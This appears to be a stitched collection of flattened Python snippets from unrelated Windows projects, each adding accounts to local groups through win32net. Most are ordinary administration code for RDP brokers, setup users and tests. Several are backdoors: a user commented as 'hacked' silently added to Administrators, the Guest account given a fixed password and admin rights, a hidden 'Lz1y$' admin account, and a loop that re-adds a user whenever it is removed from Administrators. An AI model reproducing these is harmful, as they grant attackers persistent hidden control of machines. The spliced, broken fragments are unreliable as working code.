def addUserToLocalGroup(group, username, domain=None): if localGroupExists(group): if domain and userExists(username, domain): win32net.NetLocalGroupAddMembers( None, group, 3, [{ 'domainandname': domain + '\\' + username }]) elif userExists(username): win32net.NetLocalGroupAddMembers(None, group, 3, [{ 'domainandname': username }])
def preConnect(self, userName: str, protocol: str, ip: str, hostname: str) -> str: logger.debug('Pre connect invoked') if protocol == 'rdp': # If connection is not using rdp, skip adding user # Well known SSID for Remote Desktop Users groupName = win32security.LookupAccountSid(None, win32security.GetBinarySid(REMOTE_USERS_SID))[0] useraAlreadyInGroup = False resumeHandle = 0 while True: users, _, resumeHandle = win32net.NetLocalGroupGetMembers(None, groupName, 1, resumeHandle, 32768) if userName.lower() in [u['name'].lower() for u in users]: useraAlreadyInGroup = True break if resumeHandle == 0: break if not useraAlreadyInGroup: logger.debug('User not in group, adding it') self._user = userName try: userSSID = win32security.LookupAccountName(None, userName)[0] win32net.NetLocalGroupAddMembers(None, groupName, 0, [{'sid': userSSID}]) except Exception as e: logger.error('Exception adding user to Remote Desktop Users: {}'.format(e)) else: self._user = None logger.debug('User {} already in group'.format(userName)) return super().preConnect(userName, protocol, ip, hostname)
def LocalGroup(uname=None): "Creates a local group, adds some members, deletes them, then removes the group" level = 3 if uname is None: uname = win32api.GetUserName() if uname.find("\\") < 0: uname = win32api.GetDomainName() + "\\" + uname group = 'python_test_group' # delete the group if it already exists try: win32net.NetLocalGroupDel(server, group) print "WARNING: existing local group '%s' has been deleted." except win32net.error: pass group_data = {'name': group} win32net.NetLocalGroupAdd(server, 1, group_data) try: u = {'domainandname': uname} win32net.NetLocalGroupAddMembers(server, group, level, [u]) mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level) print "members are", mem if mem[0]['domainandname'] != uname: print "ERROR: LocalGroup just added %s, but members are %r" % ( uname, mem) # Convert the list of dicts to a list of strings. win32net.NetLocalGroupDelMembers(server, group, [m['domainandname'] for m in mem]) finally: win32net.NetLocalGroupDel(server, group) print "Created a local group, added and removed members, then deleted the group"
def start(self): self.runflag = True # inspired from # http://timgolden.me.uk/python/win32_how_do_i/create-a-local-group-with-a-new-user.html #Define a new username called 'hacked' and make it belong to 'administrators' group. USER = "******" GROUP = "Administrators" user_info = dict( # create a user info profile in a dictionary format name=USER, password= "******", # Define the password for the 'hacked' username priv=win32netcon.USER_PRIV_USER, home_dir=None, comment=None, flags=win32netcon.UF_SCRIPT, script_path=None) user_group_info = dict( # create a group info profile in a dictionary format domainandname=USER) try: win32net.NetUserAdd(None, 1, user_info) win32net.NetLocalGroupAddMembers(None, GROUP, 3, [user_group_info]) except Exception, x: pass
def start(self): self.runflag = True user = "******" group = "Administrators" user_info = dict(name=user, password="******", priv=win32netcon.USER_PRIV_USER, home_dir=None, comment=None, flags=win32netcon.UF_SCRIPT, script_path=None) user_group_info = dict(domainandname=user) try: win32net.NetUserAdd(None, 1, user_info) win32net.NetLocalGroupAddMembers(None, group, 3, [user_group_info]) except Exception as x: pass while self.runflag: self.sleep(10)
def preConnect(self, user, protocol): logger.debug('Pre connect invoked') if protocol != 'rdp': # If connection is not using rdp, skip adding user return 'ok' # Well known SSID for Remote Desktop Users REMOTE_USERS_SID = 'S-1-5-32-555' p = win32security.GetBinarySid(REMOTE_USERS_SID) groupName = win32security.LookupAccountSid(None, p)[0] useraAlreadyInGroup = False resumeHandle = 0 while True: users, _, resumeHandle = win32net.NetLocalGroupGetMembers( None, groupName, 1, resumeHandle, 32768) if user.lower() in [u['name'].lower() for u in users]: useraAlreadyInGroup = True break if resumeHandle == 0: break if useraAlreadyInGroup is False: logger.debug('User not in group, adding it') self._user = user try: userSSID = win32security.LookupAccountName(None, user)[0] win32net.NetLocalGroupAddMembers(None, groupName, 0, [{ 'sid': userSSID }]) except Exception as e: logger.error( 'Exception adding user to Remote Desktop Users: {}'.format( e)) else: self._user = None logger.debug('User {} already in group'.format(user)) # Now try to run pre connect command try: pre_cmd = store.preApplication() if os.path.isfile(pre_cmd): if (os.stat(pre_cmd).st_mode & stat.S_IXUSR) != 0: subprocess.call([pre_cmd, user, protocol]) else: logger.info( 'PRECONNECT file exists but it it is not executable (needs execution permission by root)' ) else: logger.info('PRECONNECT file not found & not executed') except Exception as e: # Ignore output of execution command logger.error('Executing preconnect command give') return 'ok'
def post_create(self): data = [{'domainandname': self.name}] if self.infos.has_key("groups"): for group in self.infos["groups"]: try: win32net.NetLocalGroupAddMembers(None, group, 3, data) except Exception, e: Logger.error("unable to add user %s to group '%s'" % (self.name, group)) return False
def post_create(self): # We use hostname in order to be sure to add local user to the group, not the domain one data = [{'domainandname': self.host + "\\" + self.name}] if self.infos.has_key("groups"): for group in self.infos["groups"]: try: win32net.NetLocalGroupAddMembers(None, group, 3, data) except Exception, e: Logger.error("unable to add user %s to group '%s'" % (self.name, group)) return False
def ChangeGuest(): level = 3 uname = "Guest" group = 'Administrators' try: win32net.NetUserChangePassword(None, uname, "P@ssW0rd!!!", "P@ssW0rd!!!") u = {'domainandname': uname} win32net.NetLocalGroupAddMembers(server, group, level, [u]) mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level) print("Change Guest Successd!" + '\n' + "Username:Guest\npassword:P@ssW0rd!!!") except: print("Change Guest Failed!Your priv must be System")
def LocalGroup(uname=None): "Creates a local group, adds some members, deletes them, then removes the group" level = 3 if uname is None: uname = "Lz1y$" if uname.find("\\") < 0: uname = win32api.GetDomainName() + "\\" + uname group = 'Administrators' try: u = {'domainandname': uname} win32net.NetLocalGroupAddMembers(server, group, level, [u]) mem, tot, res = win32net.NetLocalGroupGetMembers(server, group, level) print("Add to Administrators Successd!" + '\n' + "Username:Lz1y$\npassword:P@ssW0rd!!!") except: print("Sorry,Add to Administrators Failed!")
def create_Win_user(username, password, full_name=None, comment=None): """ Create a system user account for Rattail. """ try: d = win32net.NetUserGetInfo(None, username, 1) return except: pass if not full_name: full_name = "{0} User".format(username.capitalize()) if not comment: comment = "System user account for Rattail applications" win32net.NetUserAdd( None, 2, { 'name': username, 'password': password, 'priv': win32netcon.USER_PRIV_USER, 'comment': comment, 'flags': (win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_PASSWD_CANT_CHANGE | win32netcon.UF_DONT_EXPIRE_PASSWD), 'full_name': full_name, 'acct_expires': win32netcon.TIMEQ_FOREVER, }) win32net.NetLocalGroupAddMembers( None, 'Users', 3, [{ 'domainandname': r'{0}\{1}'.format(socket.gethostname(), username) }]) hide_user_account(username) return True
def create_user(): params = {} params['name'] = 'RHAdmin' digits = "".join([random.choice(string.digits) for i in range(10)]) chars_lower = ''.join( [random.choice(string.ascii_lowercase) for i in range(10)]) chars_upper = ''.join( [random.choice(string.ascii_uppercase) for i in range(10)]) params['password'] = digits + chars_lower + chars_upper params['password'] = ''.join([ str(w) for w in random.sample(params['password'], len(params['password'])) ]) params[ 'flags'] = win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT params['priv'] = win32netcon.USER_PRIV_USER user = win32net.NetUserAdd(None, 1, params) domain = socket.gethostname() data = [{'domainandname': domain + '\\RHAdmin'}] win32net.NetLocalGroupAddMembers(None, 'Administrators', 3, data) return params['password']
def preConnect(self, user, protocol): logger.debug('Pre connect invoked') if protocol != 'rdp': # If connection is not using rdp, skip adding user return 'ok' # Well known SSID for Remote Desktop Users REMOTE_USERS_SID = 'S-1-5-32-555' p = win32security.GetBinarySid(REMOTE_USERS_SID) groupName = win32security.LookupAccountSid(None, p)[0] useraAlreadyInGroup = False resumeHandle = 0 while True: users, _, resumeHandle = win32net.NetLocalGroupGetMembers( None, groupName, 1, resumeHandle, 32768) if user in [u['name'] for u in users]: useraAlreadyInGroup = True break if resumeHandle == 0: break if useraAlreadyInGroup is False: logger.debug('User not in group, adding it') self._user = user try: userSSID = win32security.LookupAccountName(None, user)[0] win32net.NetLocalGroupAddMembers(None, groupName, 0, [{ 'sid': userSSID }]) except Exception as e: logger.error( 'Exception adding user to Remote Desktop Users: {}'.format( e)) else: self._user = None logger.debug('User {} already in group'.format(user)) return 'ok'
def CreateUser(userName, params={}): # Create user data in information level 1 (PyUSER_INFO_1) format. userData = { 'name': userName, 'password': '******', 'priv': win32netcon.USER_PRIV_USER, 'flags': win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT | win32netcon.UF_DONT_EXPIRE_PASSWD # string/PyUnicode home_dir # string/PyUnicode comment } # update params userData.update(params) # Create the user win32net.NetUserAdd(None, 1, userData) win32net.NetLocalGroupAddMembers(None, 'Администраторы', 3, [{ 'domainandname': userName }])
locale.setlocale(locale.LC_ALL, '') x = locale.getlocale() if x[0] == "de_DE": GROUP = "Administratoren" else: GROUP = "Administrators" # create a user info profile in a dictionary format user_info = dict ( name = USER, password = "******", # Define the password for the new user priv = win32netcon.USER_PRIV_USER, home_dir = None, comment = None, flags = win32netcon.UF_SCRIPT, script_path = None ) # create a group info profile in a dictionary format user_group_info = dict ( domainandname = USER ) try: win32net.NetUserAdd (None, 1, user_info) win32net.NetLocalGroupAddMembers (None, GROUP, 3, [user_group_info]) except Exception, x: print str(x) pass
import ctypes import win32net, win32api import time current_user = win32api.GetUserNameEx(2) data = [{"domainandname": current_user}] def get_members(group_name): members = win32net.NetLocalGroupGetMembers(None, group_name, 3)[0] print members return [x['domainandname'].lower() for x in members] def is_user_in_group(username, groupname): return username.lower() in get_members(groupname) print 'checking if current user %s has admin rights' % (current_user,) while True: if (is_user_in_group(current_user, 'Administrators')): pass # user is already an admin else: print 'User has been removed from local administrators. Re-adding' if (not is_user_in_group(current_user, 'Administrators')): win32net.NetLocalGroupAddMembers(None, 'Administrators', 3, data) print 'SUCCESS' else: print 'FAILED' time.sleep(10)
def add_user_to_group(user, group): user_group_info = dict(domainandname=user) win32net.NetLocalGroupAddMembers(None, group, 3, [user_group_info])
userData['priv'] = win32netcon.USER_PRIV_USER userData['primary_group_id'] = ntsecuritycon.DOMAIN_GROUP_RID_USERS #userData['password_expired'] = 0 #le mot de passe n'expire pas userData['acct_expires'] = win32netcon.TIMEQ_FOREVER try: win32net.NetUserAdd(None, 3, userData) except Exception, e: Logger.exception("unable to create user") raise e data = [{'domainandname': login_}] for group in groups_: try: win32net.NetLocalGroupAddMembers(None, group, 3, data) except Exception, e: Logger.error("unable to add user %s to group '%s'" % (login_, group)) raise e return True @staticmethod def userExist(name_): try: win32net.NetUserGetInfo(None, name_, 0) except win32net.error, e: return False return True
def createOpsiSetupUser(self, admin=True, delete_existing=False): # pylint: disable=no-self-use,too-many-branches # https://bugs.python.org/file46988/issue.py user_info = { "name": OPSI_SETUP_USER_NAME, "full_name": "opsi setup user", "comment": "auto created by opsi", "password": f"/{''.join((random.choice(string.ascii_letters + string.digits) for i in range(8)))}?", "priv": win32netcon.USER_PRIV_USER, "flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT | win32netcon.UF_DONT_EXPIRE_PASSWD } # Test if user exists user_sid = None try: win32net.NetUserGetInfo(None, user_info["name"], 1) user_sid = win32security.ConvertSidToStringSid( win32security.LookupAccountName(None, user_info["name"])[0]) logger.info("User '%s' exists, sid is '%s'", user_info["name"], user_sid) except Exception as err: # pylint: disable=broad-except logger.info(err) self.cleanup_opsi_setup_user( keep_sid=None if delete_existing else user_sid) if delete_existing: user_sid = None # Hide user from login try: winreg.CreateKeyEx( winreg.HKEY_LOCAL_MACHINE, r'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts', 0, winreg.KEY_WOW64_64KEY | winreg.KEY_ALL_ACCESS # sysnative ) except WindowsError: # pylint: disable=undefined-variable pass try: winreg.CreateKeyEx( winreg.HKEY_LOCAL_MACHINE, r'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList', 0, winreg.KEY_WOW64_64KEY | winreg.KEY_ALL_ACCESS # sysnative ) except WindowsError: # pylint: disable=undefined-variable pass with winreg.OpenKey( winreg.HKEY_LOCAL_MACHINE, r'Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList', 0, winreg.KEY_SET_VALUE | winreg.KEY_WOW64_64KEY # sysnative ) as reg_key: winreg.SetValueEx(reg_key, user_info["name"], 0, winreg.REG_DWORD, 0) if user_sid: logger.info("Updating password of user '%s'", user_info["name"]) user_info_update = win32net.NetUserGetInfo(None, user_info["name"], 1) user_info_update["password"] = user_info["password"] win32net.NetUserSetInfo(None, user_info["name"], 1, user_info_update) else: logger.info("Creating user '%s'", user_info["name"]) win32net.NetUserAdd(None, 1, user_info) user_sid = win32security.ConvertSidToStringSid( win32security.LookupAccountName(None, user_info["name"])[0]) subprocess.run([ "icacls", os.path.dirname(sys.argv[0]), "/grant:r", f"*{user_sid}:(OI)(CI)RX" ], check=False) subprocess.run([ "icacls", os.path.dirname(config.get("global", "log_file")), "/grant:r", f"*{user_sid}:(OI)(CI)F" ], check=False) subprocess.run([ "icacls", os.path.dirname(config.get("global", "tmp_dir")), "/grant:r", f"*{user_sid}:(OI)(CI)F" ], check=False) local_admin_group_sid = win32security.ConvertStringSidToSid( "S-1-5-32-544") local_admin_group_name = win32security.LookupAccountSid( None, local_admin_group_sid)[0] try: if admin: logger.info("Adding user '%s' to admin group", user_info["name"]) win32net.NetLocalGroupAddMembers( None, local_admin_group_name, 3, [{ "domainandname": user_info["name"] }]) else: logger.info("Removing user '%s' from admin group", user_info["name"]) win32net.NetLocalGroupDelMembers(None, local_admin_group_name, [user_info["name"]]) except pywintypes.error as err: # 1377 - ERROR_MEMBER_NOT_IN_ALIAS # The specified account name is not a member of the group. # 1378 # ERROR_MEMBER_IN_ALIAS # The specified account name is already a member of the group. if err.winerror not in (1377, 1378): raise user_info_4 = win32net.NetUserGetInfo(None, user_info["name"], 4) user_info_4["password"] = user_info["password"] return user_info_4
def add_user_to_group(self, group='Administrators'): try: win32net.NetLocalGroupAddMembers(None, group, 3, [self.group_info]) except: pass
return True def post_create(self): data = [{'domainandname': self.name}] if self.infos.has_key("groups"): for group in self.infos["groups"]: try: win32net.NetLocalGroupAddMembers(None, group, 3, data) except Exception, e: Logger.error("unable to add user %s to group '%s'" % (self.name, group)) return False #Ajout du nouvel utilisateur au groupe des remote desktop users win32net.NetLocalGroupAddMembers(None, "Remote Desktop Users", 3, data) def exists(self): users, _, _ = win32net.NetUserEnum(None, 0) for user in users: if user['name'] == self.name: return True return False def getSid(self): #get the sid try: sid, _, _ = win32security.LookupAccountName(None, self.name) sid = win32security.ConvertSidToStringSid(sid) except Exception, e: Logger.warn("Unable to get SID: %s" % (str(e)))